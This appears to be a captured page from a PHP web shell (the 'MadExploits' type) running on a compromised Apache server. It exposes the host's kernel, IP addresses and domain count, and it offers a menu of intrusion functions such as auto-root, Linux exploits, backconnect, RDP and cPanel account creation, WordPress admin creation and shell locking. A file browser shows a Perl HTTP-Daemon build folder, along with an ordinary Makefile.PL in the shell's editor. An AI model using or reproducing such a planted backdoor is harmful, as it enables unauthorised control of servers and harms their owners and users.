Linux dpw.dpwebtech.com 3.10.0-1160.88.1.el7.x86_64 #1 SMP Tue Mar 7 15:41:52 UTC 2023 x86_64
Apache
: 192.232.243.69 | : 3.15.182.201
54 Domain
7.3.33
dpclient
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
.cpanplus /
5.16.3 /
build /
HTTP-Daemon-6.12 /
[ HOME SHELL ]
Name
Size
Permission
Action
blib
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
t
[ DIR ]
drwxr-xr-x
xt
[ DIR ]
drwxr-xr-x
Build.PL
3.89
KB
-rw-r--r--
CONTRIBUTING
3.99
KB
-rw-r--r--
Changes
2.42
KB
-rw-r--r--
INSTALL
2.28
KB
-rw-r--r--
LICENCE
17.91
KB
-rw-r--r--
MANIFEST
705
B
-rw-r--r--
META.json
48.53
KB
-rw-r--r--
META.yml
28.86
KB
-rw-r--r--
MYMETA.json
48.6
KB
-rw-r--r--
MYMETA.yml
28.88
KB
-rw-r--r--
Makefile
31.49
KB
-rw-r--r--
Makefile.PL
3.8
KB
-rw-r--r--
README
355
B
-rw-r--r--
cpanfile
1.92
KB
-rw-r--r--
dist.ini
831
B
-rw-r--r--
pm_to_blib
0
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Makefile.PL
# This Makefile.PL for HTTP-Daemon was generated by # Dist::Zilla::Plugin::MakeMaker::Fallback 0.030 # and Dist::Zilla::Plugin::MakeMaker::Awesome 0.48. # Don't edit it but the dist.ini and plugins used to construct it. use strict; use warnings; use 5.006; use ExtUtils::MakeMaker; BEGIN { my %configure_requires = ( 'ExtUtils::MakeMaker' => '0', 'Module::Build::Tiny' => '0.034', ); my %errors = map { eval "require $_; $_->VERSION($configure_requires{$_}); 1"; $_ => $@, } keys %configure_requires; if (grep { $_ } values %errors) { warn "Errors from configure prereqs:\n" . do { require Data::Dumper; Data::Dumper->new([ \%errors ])->Indent(2)->Terse(1)->Sortkeys(1)->Dump; }; } if (not $ENV{PERL_MM_FALLBACK_SILENCE_WARNING}) { warn <<'EOW'; *** WARNING WARNING WARNING WARNING WARNING WARNING WARNING WARNING *** If you're seeing this warning, your toolchain is really, really old* and you'll almost certainly have problems installing CPAN modules from this century. But never fear, dear user, for we have the technology to fix this! If you're using CPAN.pm to install things, then you can upgrade it using: cpan CPAN If you're using CPANPLUS to install things, then you can upgrade it using: cpanp CPANPLUS If you're using cpanminus, you shouldn't be seeing this message in the first place, so please file an issue on github. If you're using a packaging tool through a unix distribution, this issue should be reported to the package manager. If you're installing manually, please retrain your fingers to run Build.PL when present instead of Makefile.PL. This public service announcement was brought to you by the Perl Toolchain Gang, the irc.perl.org #toolchain IRC channel, and the number 42. ---- * Alternatively, you are doing something overly clever, in which case you should consider setting the 'prefer_installer' config option in CPAN.pm, or 'prefer_makefile' in CPANPLUS, to 'mb" and '0' respectively. You can also silence this warning for future installations by setting the PERL_MM_FALLBACK_SILENCE_WARNING environment variable. EOW sleep 10 if -t STDIN && (-t STDOUT || !(-f STDOUT || -c STDOUT)); } } # end BEGIN my %WriteMakefileArgs = ( "ABSTRACT" => "A simple http server class", "AUTHOR" => "Gisle Aas <gisle\@activestate.com>", "CONFIGURE_REQUIRES" => { "ExtUtils::MakeMaker" => 0, "Module::Build::Tiny" => "0.034" }, "DISTNAME" => "HTTP-Daemon", "LICENSE" => "perl", "MIN_PERL_VERSION" => "5.006", "NAME" => "HTTP::Daemon", "PL_FILES" => {}, "PREREQ_PM" => { "Carp" => 0, "HTTP::Date" => 6, "HTTP::Request" => 6, "HTTP::Response" => 6, "HTTP::Status" => 6, "IO::Socket::IP" => "0.25", "LWP::MediaTypes" => 6, "Socket" => 0, "strict" => 0, "warnings" => 0 }, "TEST_REQUIRES" => { "File::Spec" => 0, "HTTP::Tiny" => "0.042", "IO::Socket::IP" => "0.25", "Module::Metadata" => 0, "Test" => 0, "Test::More" => "0.98", "Test::Needs" => 0, "URI" => 0 }, "VERSION" => "6.12", "test" => { "TESTS" => "t/*.t t/local/*.t t/robot/*.t" } ); my %FallbackPrereqs = ( "Carp" => 0, "File::Spec" => 0, "HTTP::Date" => 6, "HTTP::Request" => 6, "HTTP::Response" => 6, "HTTP::Status" => 6, "HTTP::Tiny" => "0.042", "IO::Socket::IP" => "0.25", "LWP::MediaTypes" => 6, "Module::Metadata" => 0, "Socket" => 0, "Test" => 0, "Test::More" => "0.98", "Test::Needs" => 0, "URI" => 0, "strict" => 0, "warnings" => 0 ); unless ( eval { ExtUtils::MakeMaker->VERSION('6.63_03') } ) { delete $WriteMakefileArgs{TEST_REQUIRES}; delete $WriteMakefileArgs{BUILD_REQUIRES}; $WriteMakefileArgs{PREREQ_PM} = \%FallbackPrereqs; } delete $WriteMakefileArgs{CONFIGURE_REQUIRES} unless eval { ExtUtils::MakeMaker->VERSION(6.52) }; WriteMakefile(%WriteMakefileArgs);
Close